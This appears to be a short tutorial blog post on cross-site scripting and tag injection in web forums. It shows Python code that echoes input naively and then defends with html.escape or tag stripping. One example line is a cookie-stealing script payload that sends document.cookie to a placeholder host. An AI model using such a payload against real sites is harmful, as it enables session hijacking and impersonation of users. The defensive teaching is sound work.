Note: You can't trust user input
Consider, if you will, a page containing a textarea and a submit button. The user can enter whatever text they like and press the button. The text is saved in a database and displayed on a separate page for all to see. Any web-based discussion forum you please will do as an example.
You can't just echo the user's input to a page. Why not? Well, the user might put HTML tags in their text. Even assuming no malicious intent whatsoever, there's always the possibility of a missing </b> tag, causing the rest of the page to show up bold.
Assuming malicious intent, the user could insert a script block that pops open a new window to a different server, with the current user's cookies attached to the URL. Whoever runs that other server can then read the cookie information out of its logs. If the discussion board doesn't have good security measures, it might be possible to use someone else's cookies and post under their name.
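To make both failure modes concrete, here is a minimal sketch of a page that echoes input untouched. The function name render_comment_naive, the div wrapper, and the evil.example host are all made up for illustration; a real forum's template will look different.

```python
def render_comment_naive(comment: str) -> str:
    # Hypothetical template: drops the user's text straight into the markup.
    return '<div class="comment">' + comment + "</div>"


# A forgetful user: the <b> is never closed, so it leaks into the rest of the page.
sloppy = "This is <b>important!"

# A hostile user: the script would run in every visitor's browser and send
# their cookies to another server (evil.example is a placeholder host).
hostile = '<script>window.open("http://evil.example/?c=" + document.cookie)</script>'

page = render_comment_naive(sloppy) + render_comment_naive(hostile)
print(page)
```

The printed page contains the open bold tag and a live script block exactly as typed, which is the whole problem.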
Since there are far too many bored 12-year-olds out there, you always have to assume the worst: that there will be malicious intent, and that it will happen immediately. I call people who go around doing this "Internet Terrorists", but only because I can't think of a more condescending name for them. I suppose "script kiddies" works too, but then I'd have to go around explaining what that meant to people at work.
So at the very least, you have to strip out HTML tags, or change angle brackets to entities so the HTML shows as source code, or otherwise defuse potential HTML in user input.
(Note: using HTML tags in an input form to goof up the display of a page is known as "Tag Injection", or "Script Injection" if it specifically includes script.)
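Luckily, most languages commonly used for Web programming have a function to strip HTML tags or encode special characters as entities. In Python you can use html.escape(text) to encode entities (older code used cgi.escape(text), which was deprecated in Python 3.2 and removed in 3.8) or re.sub(r"(<[^>]*>)", '', text) to strip out tags.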
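Here is a rough sketch of both approaches in Python 3. It uses html.escape from the standard library, which is the current replacement for cgi.escape; the helper names encode_entities and strip_tags are my own, not part of any library.

```python
import html
import re

# Same idea as the regex above: anything from "<" up to the next ">".
TAG_PATTERN = re.compile(r"<[^>]*>")


def encode_entities(text: str) -> str:
    # Turns &, <, > and quotes into entities so the browser shows the
    # HTML as source text instead of interpreting it.
    return html.escape(text, quote=True)


def strip_tags(text: str) -> str:
    # Removes anything that looks like a tag. The text between tags stays,
    # including the body of a script block.
    return TAG_PATTERN.sub("", text)


comment = 'Hi <b>there<script>alert("x")</script>'
print(encode_entities(comment))
print(strip_tags(comment))
```

Encoding is usually the safer of the two. The regex only catches well-formed tags, so a stray "<script" with no closing bracket slips through, and the script text itself is left behind in the output.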